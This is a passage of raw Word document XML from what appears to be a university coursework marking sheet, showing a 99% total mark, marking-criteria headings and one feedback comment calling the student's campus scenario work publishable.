          <w:p w14:paraId="1FD6D62D" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="18" w:name="totalMark"/>
            <w:bookmarkEnd w:id="18"/>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>99%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="387F7433" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6062" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1CAB20ED" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2903" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="6C1AE775" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Up to four weeks late</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5F2E58A8" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="19" w:name="fourWeeksLate"/>
            <w:bookmarkEnd w:id="19"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="100C0744" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:ind w:leftChars="71" w:left="142"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="73060D31" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6062" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0C99A0B9" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2903" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7CB784A9" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>First Attempt?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="27695516" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="20" w:name="firstAttempt"/>
            <w:bookmarkEnd w:id="20"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0EF1F30E" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:ind w:firstLineChars="141" w:firstLine="282"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A34F7FA" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E529AA3" w14:textId="77777777" w:rsidR="002010EA" w:rsidRDefault="002010EA" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:sectPr w:rsidR="002010EA" w:rsidSect="00C57238">
          <w:footerReference w:type="default" r:id="rId57"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="567" w:right="720" w:bottom="567" w:left="720" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="520340EC" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>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2010EA" w:rsidRPr="002010EA" w14:paraId="2DCF1D63" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10670" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:p w14:paraId="61DE722D" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:br w:type="page"/>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:caps/>
                <w:sz w:val="40"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">                 marking criteria and Student FEEDBACK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7DA72E29" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11A2DAE0" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002010EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">This section details the assessment criteria. The </w:t>
      </w:r>
      <w:r w:rsidRPr="002010EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:i/>
        </w:rPr>
        <w:t>extent</w:t>
      </w:r>
      <w:r w:rsidRPr="002010EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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FB38025" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9274"/>
        <w:gridCol w:w="592"/>
        <w:gridCol w:w="590"/>
      </w:tblGrid>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="057D7D3A" w14:textId="77777777" w:rsidTr="00167CC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447CAD5" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">Common Assessment Criteria </w:t>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Applied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213D1A7B" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:ind w:left="34" w:right="113"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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02DB700" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:ind w:left="113" w:right="113"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">Marks </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34D25E6E" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:ind w:left="113" w:right="113"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>awarded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="2B5F1504" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="3A39D6B0" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Research-informed Literature</w:t>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57EDF5C1" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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EF9C274" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">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EA5D813" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="57C78CAD" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="79B5F232" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="54196DC3" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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6E94A695" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="14C587F0" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D6CAE14" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>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6D5EF7F3" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">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F5B1871" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="3E0120A8" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="78FCB06A" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:b/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Knowledge and Understanding of Subject</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1108D57C" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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AF2BD02" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">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D49A9B9" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:sz w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002010EA" w:rsidRPr="002010EA" w14:paraId="563FEEB2" w14:textId="77777777" w:rsidTr="00167CCE">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4C4EB003" w14:textId="00BF0334" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">You have demonstrated the level of knowledge and understanding. You have excellently explain and analyse the scenarios you derived for the campus from your chosen research area(s) in a meaningful and practical way. A </w:t>
            </w:r>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>publishable</w:t>
            </w:r>
            <w:bookmarkStart w:id="21" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="21"/>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> work. (Grade mark: 100.00%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="01C33AE9" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>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9B7ABA0" w14:textId="77777777" w:rsidR="002010EA" w:rsidRPr="002010EA" w:rsidRDefault="002010EA" w:rsidP="002010EA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002010EA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
